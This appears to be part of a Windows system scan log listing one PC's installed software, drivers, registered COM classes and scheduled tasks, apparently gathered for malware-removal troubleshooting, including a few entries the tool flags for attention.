Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23506 (HKLM-x32\...\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506 (HKLM-x32\...\{23daf363-3020-4059-b3ae-dc4ad39fed19}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.60724 - Microsoft Corporation)
MINIONAPP (HKLM-x32\...\MINIONAPP) (Version:  - )
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 50.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.0 (x86 en-US)) (Version: 50.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.0.0.6152 - Mozilla)
Nitro Pro 10 (HKLM\...\{C78478E6-8206-470E-B843-0204995371C6}) (Version: 10.5.1.17 - Nitro)
NVIDIA 3D Vision Driver 364.51 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.51 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Graphics Driver 364.51 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.51 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4745.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4745.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4745.1002 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (Version: 16.0.4229.1002 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.4229.1002 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.4229.1002 - Microsoft Corporation) Hidden
Office Timeline (HKLM-x32\...\{952D3A31-D176-4B3F-8BA5-ED770C2862FD}) (Version: 3.2.0 - Office Timeline)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Paladins (HKLM\...\Steam App 444090) (Version:  - Hi-Rez Studios)
Plagiarism Checker X (HKLM-x32\...\Plagiarism Checker X 5.1.4) (Version: 5.1.4 - Plagiarism Checker X, LLC)
Plagiarism Checker X (x32 Version: 5.1.4 - Plagiarism Checker X, LLC) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.332 - Qualcomm Atheros Communications)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QUESTV5-6R2013 (HKLM-x32\...\QUESTV5-6R2013) (Version: 0.5.2.1 - DELMIA CORP)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21288 - Realtek Semiconduct Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7714 - Realtek Semiconductor Corp.)
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.27 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.27.101 - Skype Technologies S.A.)
Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Tree of Savior (English Ver.) (HKLM\...\Steam App 372000) (Version:  - IMCGAMES Co.,Ltd.)
UC Browser (HKLM-x32\...\UCBrowser) (Version: 5.7.16817.1002 - UCWeb Inc.)
VBA (3821b) (x32 Version: 6.01.00.1234 - Microsoft Corporation) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Warframe (HKLM-x32\...\Steam App 230410) (Version:  - Digital Extremes)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.2.11.570 - ASUS Cloud Corporation)
Windows Driver Package - AMD (amdkmpfd) System  (02/12/2015 15.20.0.0000) (HKLM\...\708AE871DE4DE98C022B914117B48025341D07B8) (Version: 02/12/2015 15.20.0.0000 - AMD)
Windows Driver Package - AMD (amdkmpfd) System  (08/10/2015 15.201.0.0000) (HKLM\...\77418A2019FA69F93B068CA252F72AE8FCA06AFC) (Version: 08/10/2015 15.201.0.0000 - AMD)
Windows Driver Package - AMD (amdkmpfd) System  (10/27/2014 14.50.0.0000) (HKLM\...\5A7765005233CFA47E5637DE2EE4BF3DBA797BD7) (Version: 10/27/2014 14.50.0.0000 - AMD)
Windows Driver Package - ASUS (ATP) Mouse  (01/13/2015 1.0.0.233) (HKLM\...\8335D73177E6D80E7ADC00FED2275758BD28AEFB) (Version: 01/13/2015 1.0.0.233 - ASUS)
Windows Driver Package - ASUS (ATP) Mouse  (02/24/2016 1.0.0.262) (HKLM\...\62C40FA617FED5B2A080FDFA260932672C6B64D7) (Version: 02/24/2016 1.0.0.262 - ASUS)
Windows Driver Package - ASUS (HIDSwitch) System  (08/18/2015 1.0.0.5) (HKLM\...\6D6063B1EDBCB582F1E596B1EB8BBFAAA100B1BD) (Version: 08/18/2015 1.0.0.5 - ASUS)
Windows Driver Package - Compal Electronics, INC. (LPCFilter) System  (07/17/2013 1.0.64.7) (HKLM\...\BFB1E8A5D4648875943225EF2EAD7388E4A14B63) (Version: 07/17/2013 1.0.64.7 - Compal Electronics, INC.)
Windows Driver Package - Compal Electronics, INC. (RadioSwitchHid) HIDClass  (11/25/2014 1.0.0.5) (HKLM\...\41439C53BF81572B2E179478239AB8D71353CD8C) (Version: 11/25/2014 1.0.0.5 - Compal Electronics, INC.)
Windows Driver Package - ELAN SMBus (ETDSMBus) System  (08/06/2015 15.1.2.5) (HKLM\...\94D4ADBD3EF82E234DF58F1B9BD18B24B775A6D0) (Version: 08/06/2015 15.1.2.5 - ELAN SMBus)
Windows Driver Package - Intel (ICCWDT) System  (05/04/2012 9.0.1000) (HKLM\...\AB145B4AADC822DEC6DD4C8C7B5E9F3F5A49A9CA) (Version: 05/04/2012 9.0.1000 - Intel)
Windows Driver Package - Intel (ICCWDT) System  (09/20/2015 11.0.0.1007) (HKLM\...\2C8BF84CDD1779C9F2F280CB9F57EDE2A692565B) (Version: 09/20/2015 11.0.0.1007 - Intel)
Windows Driver Package - Intel (IntelHSWPcc) System  (09/04/2014 1.0.0.1018) (HKLM\...\E25E8DD6C05A5E32F31DB1F3AC00F10F9697B0E9) (Version: 09/04/2014 1.0.0.1018 - Intel)
Windows Driver Package - Intel (MEIx64) System  (05/08/2015 11.0.0.1136) (HKLM\...\6B56264885325198F50575ED257D26F2C8FD7838) (Version: 05/08/2015 11.0.0.1136 - Intel)
Windows Driver Package - Intel (MEIx64) System  (07/07/2015 11.0.0.1157) (HKLM\...\0B20AD533A71C19F1C9AC8BB34246A06D7EAD201) (Version: 07/07/2015 11.0.0.1157 - Intel)
Windows Driver Package - Intel (MEIx64) System  (08/31/2015 11.0.0.1166) (HKLM\...\56828F7A1FBB820CB823362B664C0B3A501562F9) (Version: 08/31/2015 11.0.0.1166 - Intel)
Windows Driver Package - Intel (MEIx64) System  (10/08/2015 11.0.0.1172) (HKLM\...\5C253A305A9B81390BDF72537C0C93D01AFD2AA8) (Version: 10/08/2015 11.0.0.1172 - Intel)
Windows Driver Package - Intel Corporation (btmaux) BluetoothAuxiliary  (04/01/2015 17.1.1504.0518) (HKLM\...\74038EB8F8A791CB68543FE4825A6651A165DCF4) (Version: 04/01/2015 17.1.1504.0518 - Intel Corporation)
Windows Driver Package - Intel Corporation (btmaux) BluetoothAuxiliary  (10/28/2014 17.1.1411.0496) (HKLM\...\92F58626886ABC55707526202902B79AE03331B9) (Version: 10/28/2014 17.1.1411.0496 - Intel Corporation)
Windows Driver Package - Intel Corporation (iaLPSS_GPIO) System  (02/24/2015 1.1.253.0) (HKLM\...\A9D48A9F8F3CB7E174ED8604602F6284F10BBF7F) (Version: 02/24/2015 1.1.253.0 - Intel Corporation)
Windows Driver Package - Intel Corporation (iaLPSS_GPIO) System  (06/13/2014 1.1.226.2) (HKLM\...\8BC4E9FD6C3043002821AE8637B64D1F49158967) (Version: 06/13/2014 1.1.226.2 - Intel Corporation)
Windows Driver Package - Intel Corporation (iwdbus) System  (06/08/2015 4.5.61.0) (HKLM\...\6906C4E660D2560BFFE03BF511956BAD888AEE15) (Version: 06/08/2015 4.5.61.0 - Intel Corporation)
Windows Driver Package - Intel System  (04/22/2015 10.0.27) (HKLM\...\C2E04C3A435271574D9636E46D2F9F5C4E51D695) (Version: 04/22/2015 10.0.27 - Intel)
Windows Driver Package - INTEL System  (06/26/2015 10.1.1.8) (HKLM\...\D2C960E0737522BC4A2A680A745F92CEAC5C76C6) (Version: 06/26/2015 10.1.1.8 - INTEL)
Windows Driver Package - INTEL System  (08/17/2015 10.1.1.11) (HKLM\...\CBE4A395C177DEC450816F000AAD383C8FCDED76) (Version: 08/17/2015 10.1.1.11 - INTEL)
Windows Driver Package - INTEL System  (09/21/2015 10.1.1.12) (HKLM\...\89DFBAA5404A383FAA6C8BF70D5ED1C969678B90) (Version: 09/21/2015 10.1.1.12 - INTEL)
Windows Driver Package - INTEL System  (09/21/2015 10.1.1.12) (HKLM\...\C2312C77A88CE202E250D01A0793BD38576D13BF) (Version: 09/21/2015 10.1.1.12 - INTEL)
Windows Driver Package - INTEL System  (10/28/2015 10.1.1.13) (HKLM\...\88BA94C0D148C6110CBE3FC925052722C961BE46) (Version: 10/28/2015 10.1.1.13 - INTEL)
Windows Driver Package - INTEL System  (10/28/2015 10.1.1.13) (HKLM\...\D5DCF8D64874C0501270DD6745C0B98332802514) (Version: 10/28/2015 10.1.1.13 - INTEL)
Windows Driver Package - Kionix, Inc. (kxspb) Sensor I/O devices  (09/14/2015 1.2.8.5) (HKLM\...\530FE28922151FFB70966BFE934D1189FE03A49F) (Version: 09/14/2015 1.2.8.5 - Kionix, Inc.)
Windows Driver Package - Kionix, Inc. (kxspb) Sensor I/O devices  (10/21/2014 1.2.7.9) (HKLM\...\C38347B1F2610B28BFC196DC49544B06129D43BA) (Version: 10/21/2014 1.2.7.9 - Kionix, Inc.)
Windows Driver Package - Kionix, Inc. (WUDFRd) Sensor  (09/22/2015 1.0.29.5) (HKLM\...\52D31A33575A8052149E15AC844D6E1350361F1C) (Version: 09/22/2015 1.0.29.5 - Kionix, Inc.)
Windows Driver Package - Kionix, Inc. (WUDFRd) Sensor  (10/21/2014 1.0.19.2) (HKLM\...\F7038EE78CCD48375CE4C803EAA8ECE752A0B945) (Version: 10/21/2014 1.0.19.2 - Kionix, Inc.)
Windows Driver Package - KYE System Corp. (ioFakMap) HIDClass  (09/09/2013 6.3.0.1) (HKLM\...\2D411C1C731F85B0AE8A713F3C27A67932A89369) (Version: 09/09/2013 6.3.0.1 - KYE System Corp.)
Windows Driver Package - LG Electronics Inc. (AirModeBtn) HIDClass  (08/12/2015 1.0.1508.1201) (HKLM\...\488F076C8A3658890AFD8181D71BB3E02C79B505) (Version: 08/12/2015 1.0.1508.1201 - LG Electronics Inc.)
Windows Driver Package - LXD Company (HidUsb) HIDClass  (01/26/2013 21.8.1.319) (HKLM\...\20BC7264702987FA22B790C85433BF8189B3F5CC) (Version: 01/26/2013 21.8.1.319 - LXD Company)
Windows Driver Package - Microsoft Battery  (11/13/2015 1.2.0.2) (HKLM\...\D94A6ADF78DC5F14DEE64147DCDF230ED63FD734) (Version: 11/13/2015 1.2.0.2 - Microsoft)
Windows Driver Package - NVIDIA (nvvad_WaveExtensible) MEDIA  (07/01/2015 1.2.30) (HKLM\...\679747FD57E83C302F47D978BAC9FE6AF70CE1CC) (Version: 07/01/2015 1.2.30 - NVIDIA)
Windows Driver Package - Qualcomm Atheros Communications (AthBTPort) BluetoothVirtual  (07/11/2014 5.0.0.325) (HKLM\...\38DC38C20D3DEFEC308EE9CAC3E92626A6835FE4) (Version: 07/11/2014 5.0.0.325 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_A2DP) MEDIA  (04/13/2015 8.0.0001.0344) (HKLM\...\1D55C2EFB7F9EDBC93FCAFEB4E6ED2B2808E6393) (Version: 04/13/2015 8.0.0001.0344 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_A2DP) MEDIA  (10/21/2014 8.0.0001.0334) (HKLM\...\82345FC9CC12826AC22FBD890640E3228D7B5749) (Version: 10/21/2014 8.0.0001.0334 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_BUS) System  (06/24/2014 4.0.0.302) (HKLM\...\F1D0D62AB241DAE33AEEB7B18B58C93AC5EF0960) (Version: 06/24/2014 4.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_BUS) System  (06/24/2014 5.0.0.302) (HKLM\...\23BE4DDD5B8D1D6468B9EA7477A0CB151AD2BBE0) (Version: 06/24/2014 5.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_HCRP) USB  (06/24/2014 4.0.0.302) (HKLM\...\7FDB810F985DEDF82F0A39A2E8BC92900F407E5D) (Version: 06/24/2014 4.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BTATH_RCP) HIDClass  (06/24/2014 5.0.0.302) (HKLM\...\BA6E71775209F137E4190CA49BC7D710983527F5) (Version: 06/24/2014 5.0.0.302 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (02/10/2015 8.0.0001.0341) (HKLM\...\77C4A18E3829EED89214F6A7DB29A0CC0B7633AC) (Version: 02/10/2015 8.0.0001.0341 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (04/13/2015 8.0.0001.0344) (HKLM\...\C82E283DDCCD918355483458494A76D34F8E0CFA) (Version: 04/13/2015 8.0.0001.0344 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (08/18/2015 8.0.0001.0350) (HKLM\...\A078EC4F59150BCFF6F354FEB73DD9F5851286B5) (Version: 08/18/2015 8.0.0001.0350 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications (BtFilter) Bluetooth  (11/15/2015 10.0.1.5) (HKLM\...\9B5152351B89F71C344AF1866B2B210A7B5B0DD4) (Version: 11/15/2015 10.0.1.5 - Qualcomm Atheros Communications)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (05/11/2015 10.0.0.315) (HKLM\...\933F7F90C905E23A1D26DB5FA1CABCEC09948DB8) (Version: 05/11/2015 10.0.0.315 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (08/14/2015 10.0.0.326) (HKLM\...\DB13626D524FDBB4F1938516AD0F957505E5E0D1) (Version: 08/14/2015 10.0.0.326 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (09/08/2015 10.0.0.328) (HKLM\...\17E0E467A4D63F7C740425A9D130DD1DD1BEB2ED) (Version: 09/08/2015 10.0.0.328 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Qualcomm Atheros Communications Inc. (athr) Net  (11/19/2015 10.0.0.329) (HKLM\...\6C56FFC61E89980B663FB6E4B5F392851F21E052) (Version: 11/19/2015 10.0.0.329 - Qualcomm Atheros Communications Inc.)
Windows Driver Package - Realtek (rt640x64) Net  (10/01/2015 10.006.1001.2015) (HKLM\...\8C869877E6B13D11BE068A1FF0AB655A587B57C7) (Version: 10/01/2015 10.006.1001.2015 - Realtek)
Windows Driver Package - Realtek (RTL8168) Net  (01/15/2015 8.038.0115.2015) (HKLM\...\A7CA58D9069C36E9CD3C2CD3EB1DCA83523B8AA3) (Version: 01/15/2015 8.038.0115.2015 - Realtek)
Windows Driver Package - Realtek (RTL8168) Net  (07/23/2015 8.040.0723.2015) (HKLM\...\26BE3CFD73A41A62774EEF6507CC626D7711405C) (Version: 07/23/2015 8.040.0723.2015 - Realtek)
Windows Driver Package - Realtek (RTL8168) Net  (10/01/2015 8.043.1001.2015) (HKLM\...\ECDA295C3C30A2525F2BFBE2BD8BCF6793745171) (Version: 10/01/2015 8.043.1001.2015 - Realtek)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (06/15/2015 10.0.10143.21278) (HKLM\...\F2FD59325AAB8BBE6C1AF29ED7F9AF722B308D9C) (Version: 06/15/2015 10.0.10143.21278 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (07/21/2015 10.0.10125.21277) (HKLM\...\9BC96092091368DDA2E6D635AB0EF426A2992B0F) (Version: 07/21/2015 10.0.10125.21277 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (08/04/2015 10.0.10240.21281) (HKLM\...\F7B7740FC9020ADAF1ECB9A80E7F7D38D10E6056) (Version: 08/04/2015 10.0.10240.21281 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (11/05/2015 10.0.10240.21283) (HKLM\...\17BCC849A54BDE6CBF50B5FA84EF12D9426EF794) (Version: 11/05/2015 10.0.10240.21283 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (11/13/2015 10.0.10240.21284) (HKLM\...\3C3E84F91B27A95FC6CE13898685AB8D64760165) (Version: 11/13/2015 10.0.10240.21284 - Realtek Semiconduct Corp.)
Windows Driver Package - Realtek Semiconduct Corp. (RTSPER) MTD  (12/12/2014 6.3.9600.21265) (HKLM\...\21EECE1A6FCC6E7F8745711F73279A44203A9645) (Version: 12/12/2014 6.3.9600.21265 - Realtek Semiconduct Corp.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 3.0.1 - ASUS)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> D:\New Folder (2)\AutoCAD 2017\acad.exe /Automation => No File
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{67F4D210-BFC2-4ADD-9A2A-C9B9E1F42C4F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> D:\New Folder (2)\AutoCAD 2017\acad.exe => No File
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> D:\New Folder (2)\AutoCAD 2017\en-US\acadficn.dll => No File
CustomCLSID: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {001204FA-A720-4E4A-8C68-F6A19FE26670} - System32\Tasks\{98E2AC70-B5FB-4270-AB02-FEA0C9C05CB5} => pcalua.exe -a D:\UninstallQUESTV5-6R2013\UninstallQUEST.exe -d D:\UninstallQUESTV5-6R2013
Task: {03E84B3B-9181-4758-972C-740444795B22} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe [2016-11-08] (Adobe Systems Incorporated)
Task: {0AA572A4-A4AB-4F79-ABDB-261BAABDF6F8} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {1482FCAC-85CE-4D06-9E9B-DA2F16054D48} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-05-17] (Dropbox, Inc.)
Task: {1CA1C9B4-450D-4C59-8EF4-C3E154D0B7A0} - System32\Tasks\ATK Package 36D18D69AFC3 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe [2014-06-12] (ASUSTek Computer Inc.)
Task: {24248C31-0D20-4AF1-A6D0-E860D00DAEAC} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2014-09-03] (ASUSTek Computer Inc.)
Task: {25673809-56FA-4924-8958-6C17476DC3D8} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe
Task: {27D2FF47-863D-4F65-A92B-DDC550618EA6} - System32\Tasks\ASUS Patch for Touch Panel => C:\ProgramData\AsTouchPanel\AsPatchTouchPanel64.exe [2013-01-09] (ASUSTek Computer INC.)
Task: {3743E126-BB86-4C9D-B1DE-330357C78341} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {37AB26B8-FC0F-4B9D-BE7D-10487420029F} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2014-09-12] (ASUSTek Computer Inc.)
Task: {43FB2EB2-70FB-4365-8F9F-11394E9F9F44} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {47437558-8450-4C65-9C63-421D75E81921} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {4FF91C70-96AE-4C29-8D5B-A7D01D1B54C5} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2015-08-27] (Microsoft Corporation)
Task: {5542EDAF-6016-406C-8E1E-95B0A1F7793A} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {57607482-32EA-459A-BA45-3F4374149C38} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-03-08] (Realtek Semiconductor)
Task: {5E0F0D2F-2336-4591-BA5D-5CA9497168A0} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-07-04] (Microsoft Corporation)
Task: {6EF337AE-3C6C-4160-99AD-920848EF3829} - System32\Tasks\DriverToolkit Autorun => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe
Task: {6EFA0047-6DC6-41EB-98E7-E4BBCC60A743} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {7A1720A3-EAAD-4776-B69B-CDCA7E9D5D41} - System32\Tasks\Zderse System => C:\Program Files (x86)\Sernetynuwuent\gapeck.exe
Task: {7A3E68FE-8760-482C-B320-605457FF6A66} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2016-03-08] (Realtek Semiconductor)
Task: {7D06E4E0-D6F5-4DB4-8F05-8B8219F26A86} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {828560A4-4907-4789-AAA4-E45CF1E5B85A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
